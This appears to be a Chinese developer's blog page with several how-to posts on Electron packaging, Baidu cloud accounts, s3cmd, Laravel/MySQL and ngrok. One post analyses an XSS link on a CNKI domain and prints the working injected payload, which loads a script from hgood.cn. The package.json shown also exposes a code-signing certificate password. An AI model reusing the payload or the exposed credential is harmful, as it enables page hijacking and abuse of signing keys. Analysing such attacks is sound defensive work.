知识的流量

知识的密度

知识的生命周期

倡议发起数字出版网络安全应急论坛

随着数字出版平台的广泛上线,网络安全问题也变得越来越突出,单靠某一个单位的安全防护是比较薄弱的,有必要组建一个相对广泛的合作组织,应对在数字出版服务过程中遇到的安全问题。 目前为个人发起,可加钉钉群:

微版云是如何用vue-electron构建mac客户端的

如何初始化项目暂且不说,请看vue-electron的官方文档。 先给大家看一下package.json的部分配置: “main”: “dist/electron/electron.js”,  “build”: {    “appId”: “ink.weiban.portal”,    “productName”: “WeiBan”,    “copyright”: “Copyright © 2019 北京商连信息科技有限公司”,    “directories”: {      “output”: “./outapp”,      “app”: “./dist”    },    “win”: {      “target”: [        “nsis”      ],      “icon”: “./static/ico/favicon256.ico”,      “artifactName”: “${productName}-Setup.${ext}”,      “publisherName”: “WeiBan”,      “signingHashAlgorithms”: [        “sha256”      ],      “signDlls”: true,      “rfc3161TimeStampServer”: “http://timestamp.digicert.com”,      “certificateFile”: “./static/codeSign/windows/shanglian.pfx”,      “certificatePassword”: “shanglian”    },    “linux”: {      “target”: [        “AppImage”      ],      “artifactName”: “${productName}.${ext}”    },    “mac”: {      “target”: [        “dmg”      ],      “icon”: “./static/ico/favicon.icns”,      “artifactName”: “${productName}.${ext}”    },    “nsis”: {      “createDesktopShortcut”: “always”    },    “publish”: {      “provider”: “s3”,      “bucket”: “electron-app”,      “endpoint”: “https://electron-app.s3.cn-north-1.amazonaws.com.cn”    }  },  “scripts”: {    “dev”: “webpack-dev-server –inline –progress –config build/webpack.dev.conf.js”,    “start”: “npm run dev”,    “unit”: “jest –config test/unit/jest.conf.js –coverage”,    “e2e”: “node test/e2e/runner.js”,    “test”: “npm run unit && npm run e2e”,    “lint”: “eslint –ext .js,.vue src test/unit test/e2e/specs”,    “build”: “node build/build.js”,    “build-electron-dev”: “node build/build-electron-dev.js”,    “build-electron-prod”: “node build/build-electron-prod.js”,    “dir”: “electron-builder –dir”,    “win32”: “electron-builder –win –ia32”,    “win64”: “electron-builder –win –x64”,    “mac”: “electron-builder –mac”,    “linux”: “electron-builder –linux”  }, 构建mac的客户端之前首先要将vue构建好,即运行: npm run build-electron-prod 然后运行: sudo yarn mac 之所以要加sudo是yarn用到一些系统目录,不加会报错。(关于如何安装yarn请看官网) yarn run v1.17.3 $ electron-builder –mac • electron-builder version=21.1.1 os=18.7.0 • loaded configuration file=package.json (“build” field) • writing effective config file=outapp/builder-effective-config.yaml • packaging platform=darwin arch=x64 electron=5.0.6 appOutDir=outapp/mac • signing file=outapp/mac/WeiBan.app identityName=Developer ID Application: Beijing Shanglian Information Technology Co., Ltd. (R65P3V6H9V) identityHash=BA45718278F5E4268071035C88A48F38A2271B1C provisioningProfile=none •

如何以正确的姿势激活百度效率云

百度效率云的具体介绍就不说了,之前是冲着icafe来的,用过一段时间,因为数据无法导出,也不方便把目前用的mantis替换掉,所以一度弃用。 现在产品发布了,面临更严重的用户需求收集和处理问题,在产品比较弱的时候,如果不能更好地把握这些需求的先后和强弱,很容易导致产品开发崩溃。icafe从story到task的过渡处理的还算不错,现在又延伸出一个效率云系列产品,按理说算是不错的敏捷开发平台了。 尽管百度说效率云是按用户收费,目前免费测试,让我有一些担忧,不过用一用也无妨,吸收一些可取之处,也为自己的协作产品找到一些灵感。 不过在初始化账户的过程中,遇到了很多困惑,以至于求助于客服依然没有解决,对接的客户经理对效率云基于没有了解,似乎是我提起她才知道。 好了,废话不多说了,下面列一下建议的步骤。假设你之前没有任何百度系的帐号的话,有的话也尽量忽略,百度系的帐号可不是那么容易注销的。 (1)创建公司/团队帐号。 https://login.bce.baidu.com/reg.html?tpl=bceplat&from=portal 建议使用以上链接直接创建百度云的帐号,百度云和百度智能云貌似是一个东西。为了方便起见,用户名建议使用公司全名,不要用自己偏好的东西,因为这个帐号无法变更主帐号,也就是基本上无法移交,只能变更绑定的手机号和邮箱。再说一遍,建议用企业全名作为用户名。 (2)登录以后在百度云一大堆产品里面找到效率云,创建的时候有个团队名称,建议也用公司全名,下面分配一个空间地址,用公司缩写字母之类比较好,一旦创建,不能修改,也要慎重,而且是全局唯一,不能跟别人重。 (3)进入效率云以后创建一个新的项目,第一个问题就是邀请团队了。找到效率云的项目设置(在左下角),找到“通用设置-权限管理”,邀请用户,这时填写的是被邀请人的邮箱,之所以这样是因为原来icafe单独部署的时候可以不依赖于百度帐号体系,就是用邮箱登录即可。假设你邀请的邮箱是fymeng@51shanglian.com,那么这个邮箱会收到一封邮件。 (4)被邀请人进入fymeng@51shanglian.com,点击邮件中的链接,提示初始化自己的密码,按照要求填写即可,然后自动登录。 (5)被邀请人激活的是一个子帐号,与用fymeng@51shanglian.com这个邮箱注册百度云帐号无关。那么当前子帐号注销了以后如何登录呢,需要请管理员照一下子帐号登录地址,管理员帐号下打开帐号控制区的多用户访问控制,会发现用户管理中的子帐号中已经有fymeng了。然后子帐号列表上方就是子帐号登录的地址,比如http://a3630175ee3744039c854eabf1d33456.login.bce.baidu.com,这里肯定不方便记忆,所以百度很贴心的给了自定义的功能,所以就可以设置为http://shanglian.login.bce.baidu.com,当然这个地址依然还是很难记的,那就需要用自己的域名解析了,比如显性URL转发。 (6)最后补充一点,子帐号登录的时候默认是用邮箱前面那个名字比如fymeng。这个可以在子帐号管理看见到底是什么。

如何使用s3cmd批量修改aws s3上的文件Content-type

首先,使用aws官方的批量处理是可以的,至少官方是这么说的,不过做文件清单然后执行,可能适合比较大量的文件。 现在用s3cmd处理可能是比较直观的方案。mac上安装s3cmd比较简单。只需要brew install s3cmd即可。安装比较慢的话设置一下brew的国内镜像源,方法:https://www.cnblogs.com/crayfish/p/6003862.html (1)s3cmd –version看看版本对不对,最好是2.0以上。 (2)s3cmd –configure启动配置引导,按提示依次输入key,没有的话去aws生成一个。 (3) s3cmd –mime-type=image/jpeg –recursive  –exclude=* –include=*.jpg modify s3://your-bucket 这就是批量的命令了。看起来还是很简单的。设置参数需要注意顺序,尤其是一定要先exclude再include,否则起不到筛选文件类型的效果,recursive保证你可以遍历bucket下的所有文件,而不是只能修改某个object的元数据。–include=*.jpg这里留意大小写,如果你的文件里有大写后缀名,需要–include=*.JPG也来一遍。

知网被植入H5

今天在微信群出现一个关于华为的H5,借着热门话题赚流量,点了一下发现果然有问题,最后弹出来的是不太好的网页。 简单分析了一下网址: http://medmap.cnki.net/refbook/AddComment.aspx?type=0&isadd=0&bid=%22%2C%29%3B%7DsetTimeout%28atob%28%27ZG9jdW1lbnQuYm9keS5pbm5lckhUTUwgPSAnJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vaGdvb2QuY24vZCc7%27%29%2C0%29%3Bfunction%20postc%28%29%20%7B%2F%2F%26name%3D 竟然是知网的域名,按说知网不至于干这个,多半是被植入了。再看里面有一个function,基本上可以判断是url参数被js调用时没有检验,被挂了js代码进去。把URL做一个DECODE,结果如下: http://medmap.cnki.net/refbook/AddComment.aspx?type=0&isadd=0&bid=”,);}setTimeout(atob(‘ZG9jdW1lbnQuYm9keS5pbm5lckhUTUwgPSAnJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vaGdvb2QuY24vZCc7’),0);function postc() {//&name= 这就看到了setTimeout定时器,里面的atob是base64解码,解码结果如下: document.body.innerHTML = ”;document.head.appendChild(document.createElement(‘script’)).src=’//hgood.cn/d’; 好了,hgood.cn,这就是目标。干坏事的是它,栽赃到知网。 把这个结果告诉知网以后,发现,植入内容也变了。

Laravel 框架 MySQL 运行报错: PDOStatement::execute (): MySQL server has gone away?

项目什么都没动,突然发现无法连远程的数据库了,只能连本地的,折腾了半天,连本地的都连不上了,简直像遇到了奇异事件。 用java程序连了一下,默认连不上,需要把usessl设为false,但是php对应的sslmode设为disable并不起作用。 尝试修改wait_timeout和connect_timeout也都无效,只是让等待的时间更长了。 直到在老同事刘明的提醒下,去查看laravel的日志,发现了这么一句:Unexpected server respose while doing caching_sha2 auth 于是,按这个问题去搜索,找到了https://www.cnblogs.com/qichao123/p/9719470.html 进到mysql,通过SELECT user,host,plugin FROM mysql.user; 确认我用的当前用户没问题,是mysql_native_password,于是继续配置my.cnf中的mysqld,添加: default_authentication_plugin=mysql_native_password 回来测试成功。

部署自己的ngrok1.7服务

非常感谢https://hteen.cn/docker/docker-ngrok.html 我的服务器是ubuntu,首先登录服务器,依次运行以下命令: 运行结果显示一个token 这样,在服务器的/root/ngrok目录下则有 bin/ngrokd 服务端 bin/ngrok linux客户端 bin/darwin_amd64/ngrok osx客户端 bin/windows_amd64/ngrok.exe windows客户端 还要增加一个nginx的站点配置,转发请求 在本地电脑执行命令,下载对应的客户端,我的是mac,所以: 然后在本地创建ngrok.yml文件,并填入以下内容: 然后在本地执行 ~/ngrok –config=ngrok.yml start weixin api 就启动了。